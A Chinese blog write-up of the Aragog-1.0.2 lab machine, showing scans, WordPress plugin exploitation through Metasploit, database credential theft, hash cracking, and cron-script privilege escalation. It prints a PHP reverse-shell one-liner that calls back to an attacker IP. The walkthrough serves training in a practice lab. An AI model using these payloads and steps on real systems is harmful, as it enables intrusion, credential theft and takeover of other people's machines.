靶机11:Aragog-1.0.2

已于 2023-11-10 15:39:35 修改
阅读量75 收藏
点赞数
分类专栏: 靶机 文章标签: linux 网络 运维
于 2023-10-31 17:17:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/133961453
版权

Aragog-1.0.2

1.信息收集

1.arp-scan -l扫描,寻找靶机

2.nmap扫描端口

sudo nmap -sV -p- 10.9.47.186 -T4

查看80端口

3.dirsearch 扫描目录

访问http://10.9.47.186/blog/

Just another WordPress site.
We will be deleting some of our unused wordpress plugins in future as security best practices.

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。

那么思路就是找到这个版本的WordPress有什么插件的漏洞。

2.漏洞扫描及利用

1.用wpscan,去注册个账号获取api-token。

wpscan --api-token=注册获取的值 --url http://10.9.47.186/blog -e p --plugins-detection aggressive

扫描到3个File Manager的漏洞

3.漏洞利用

1.使用msf进行漏洞利用

msfconsole                       #启动msf
search file manager wordpress    #查找漏洞相关exp
use 1                            #使用第1个exp
show options                     #查看需要设置的参数
set RHOSTS 192.168.15.135        #设置靶机IP
set TARGETURI /blog              #设置路径
set LHOST 192.168.15.131         #设置攻击IP
run                              #启动攻击

成功获取到shell

4.提权

1.wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码

mysql -u root -p         #连接数据库
show databases;          #查看所有数据库
use wordpress;          #使用wordpress数据库
show tables;            #查看wordpress数据库中所有表
select * from wp_users;  #查看wp_users表内容

为方便操作,首先使用python打开交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

2.使用root密码连接数据库,我们在wordpress数据库下,wp_users表中查到一条登录记录

3.使用md5解密

4.进行远程登录

ssh hagrid98@10.9.47.186
密码:password123

5.成功登录,并在当前目录下发现了第一个魂器

6.继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh

7.查看脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行

所以我们到目录/tmp下写一个反弹shell的php脚本,

<?php $sock=fsockopen("192.168.15.131",7777);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

8.然后修改.backup.sh脚本内容

9.kali开启瑞士军刀,等待反弹

成功

wj33333
关注
专栏目录
VulnHub靶机系列:Os-ByteSec
墨痕诉清风的博客
12-26 1259
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。主要突破点:通过SMB获取共享文件;通过爆破获取密码;从user.cap获取账户和密码;利用$PATH变量提权。
HarryPotter-Aragog 三部曲之第一部 靶场记录
m0_52729465的博客
08-04 115
5、WordPress搭建的网站默认数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件中,在里面找到了数据库的账号密码,进行连入;6、在hagrid98账号下我们拿到了第一个horcrux,在目录中搜寻的过程中,找到一个.backup.sh文件,查看发现脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行。2、使用dirb来扫描网站,扫出了/blog和/blog/wp-login,发现页面显示不正常,需要在/etc/hosts添加域名解析。
Aragog-1.0.2靶机
ybkj6666的博客
11-03 190
使用arp-scan找目标ip,这边可以得知我们的目标ip为192.168.187.165输入命令: 发现了2个端口开放输入命令: 这边没有扫描到udp端口输入命令: 输入命令: 但是没有扫描到扫描可利用的漏洞点页面就是一张图片(哈利波特可还行)使用dirsearch和gobuster两个工具进行目录爆破输入命令: 这里扫描到了几个目录,等下去看看怎么个事输入命令: 我们在查看这个blog目录的时候,发现跳转到了新的页面。如果页面显示不正常的话,可能是页面没有解析的原因,就像下图这样此时我们需要以root的
【Vulnhub靶机】HarryPotter-Aragog-1.0.2 漏洞复现
weixin_65900584的博客
02-26 1294
学习如何对 靶机 HarryPotter-Aragog-1.0.2 进行提权
harrypotter1-aragog靶机攻略
qq_58683895的博客
10-25 519
新人打靶机,主要突破点在wpscan的漏洞扫描,以及msf获取shell,后面猜测使用定时脚本
【Vulnhub】之Aragog-1.0.2
zg_111的博客
04-11 747
wordpress搭建的网站数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件里,查看后发现了数据库的root密码。所以我们到目录/tmp下写一个反弹shell的php脚本,然后修改.backup.sh脚本内容。浏览了下页面,发现没有可利用的点,但是我们能发现这个站点是利用wordpress搭建的。继续查看目录文件,我们在/opt目录下发现一个隐藏的脚本文件:.backup.sh。等待片刻,成功获取到root权限,并在root目录下发现了。
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 466
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机的IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4278
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1214
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3375
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 514
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
No.124-HackTheBox-Linux-Aragog-Walkthrough渗透学习
qq_34801745的博客
06-05 400
** HackTheBox-Linux-Aragog-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/126 靶机难度:中级(4.8/10) 靶机发布日期:2018年7月21日 靶机描述: Aragog is not overly challenging, however it touches on several common real-world vulnerabilities, techniques and mis
vulnhub_HARRYPOTTER: ARAGOG (1.0.2)
qq_45434762的博客
06-13 4849
主机信息kali: 192.168.1.12 Momentum:192.168.1.101 信息收集通过nmap扫描目标主机发现仅开放22、80端口nmap -T4 -A -v -p- 1...
VulnHub_HarryPotter:Aragog (1.0.2)靶机
学术渣渣的博客
08-01 1600
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列,这个系列有三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来! 首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。 渗透过程 从VlunHub上下载靶机,在virtualbox上打开,设置网络为桥接。 打开
Linux 命令:每日一学,一文说尽打包压缩工具实践
WeiyiGeek 唯一极客IT知识分享
10-12 713
[知识是人生的灯塔,只有不断学习,才能照亮前行的道路]文章目录:0x00 前言简述前面,我们介绍了Linux中文件查找find命令以及与之联用最勤的xargs命令,作者以一个个简单的实例给各位看友展示了在运维中两个命令的使用技巧,今天我们再来介绍一些打包、压缩解压等相关命令。在 Linux 系统中,我们经常需要使用到压缩和解压文件,使用压缩文件可以减少文件大小,从而减少存储空间,以及在网络传输...
Linux 命令:每日一学,参数传递之xargs命令实践
WeiyiGeek 唯一极客IT知识分享
10-11 884
描述:上一章,我们学习了Linux中查找搜寻文件或目录的相关命令,此章我们学习常常与find命令联合使用,以及在Shell脚本中常用的参数替换 xargs 命令进行实践学习,从而实现更加强大的参数传递和多进程并行执行Linux命令或脚本等Linux 命令:每日一学,参数传递之xargs命令实践此Linux 命令 | 系列文章将作为《#运维从业必学。
linux逻辑卷扩容增加空间
最新发布
放荡不羁爱自由
10-13 289
背景是使用vmware虚拟机安装的centos系统,在上面安装了mysql数据库为了测试千万级表模拟数据然后磁盘不够用了需要扩容。
Linux从小白到高手》综合应用篇:详解Linux系统调优之内存优化
qq_45732829的博客
10-11 980
内存是影响Linux性能的主要因素之一,内存资源的充足与否直接影响应用系统的使用性能。内存调优的主要目标是合理分配和利用内存资源,减少内存浪费,提高内存利用率,从而提升系统整体性能。
My-cmsms靶机实战:ARP与Nmap扫描漏洞检测
在本篇vulnhub靶机实战指南中,我们将会深入探讨针对"My-cmsms"靶机的实战操作。My-cmsms是一个基于MyCMS搭建的靶机,提供了一系列安全漏洞供网络安全爱好者进行渗透测试和学习。本文档以第26页开始,涵盖了两个关键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值